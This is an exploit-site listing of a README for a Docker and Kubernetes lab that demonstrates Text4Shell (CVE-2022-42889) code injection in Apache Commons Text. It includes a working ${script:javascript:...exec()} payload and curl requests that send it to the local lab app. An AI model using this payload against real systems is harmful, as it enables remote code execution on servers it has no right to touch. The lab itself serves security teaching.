Exploit for Code Injection in Apache Commons Text CVE-2022-42889

Name: Exploit for Code Injection in Apache Commons Text CVE-2022-42889
Rating: 5 (174 reviews)
2023-02-28 | CVSS 7.5
## https://sploitus.com/exploit?id=613F7F41-D617-5C65-87E3-7387588128F6
# Text4Shell CVE-2022-42889

## Docker Lab for CVE-2022-42889

> You can either build the Docker image locally or pull the image from Docker Hub and run the container.

### Clone the repo

```bash
git clone https://github.com/devenes/text4shell-cve-2022-42889.git
```

### Build the Docker image locally

```bash
docker build --tag=text4shell .
```

### Run the Docker container

```bash
docker run -d --rm -p 8080:8080 text4shell
```

### Or pull the image from Docker Hub and run the container

```bash
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0
```

### Test the app by passing a string to the `search` parameter:

```bash
curl http://localhost/text4shell/attack?search=<anything>
```

- Attack can be performed by passing a string `${prefix:name}` where the prefix is the aforementioned lookup:

```java
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```

### Attack using `curl`:

```bash
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
```

- You can also try using `dns` or `url` prefixes

### Get the container id

```bash
docker container ls
```

### Get into the container

```bash
docker exec -it <container_id> bash
```

### Check if the RCE attack was successful

- You should see a file named `foo` created in the `/tmp` directory:

```bash
ls /tmp/
```

### You can stop the container by running the following command

```bash
docker container stop <container_id>
```

## Kubernetes Lab for CVE-2022-42889

### Change the directory to `kubernetes` and follow the instructions in the `README.md` file.

```bash
cd kubernetes
```

### Create kind cluster

```bash
kind create cluster --config kind-config.yaml
```

### Deploy the vulnerable app to the cluster

```bash
kubectl apply -f deployment.yaml
```

### Create a service to expose the app

```bash
kubectl apply -f service.yaml
```

### Attack the vulnerable app using `curl`

```bash
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
```

### Get the pod name using `kubectl get pods`

```bash
kubectl get pods
```

### Get into the pod using `kubectl exec`

```bash
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash
```

### Check if the attack was successful

```bash
ls /tmp/ | grep foo
```

### You can find the detailed tutorial on my [Udemy course here](https://www.udemy.com/course/owasp-top-10-for-docker-and-kubernetes-security/)

---

References:

- https://github.com/karthikuj/cve-2022-42889-text4shell-docker
- https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
- https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
- https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd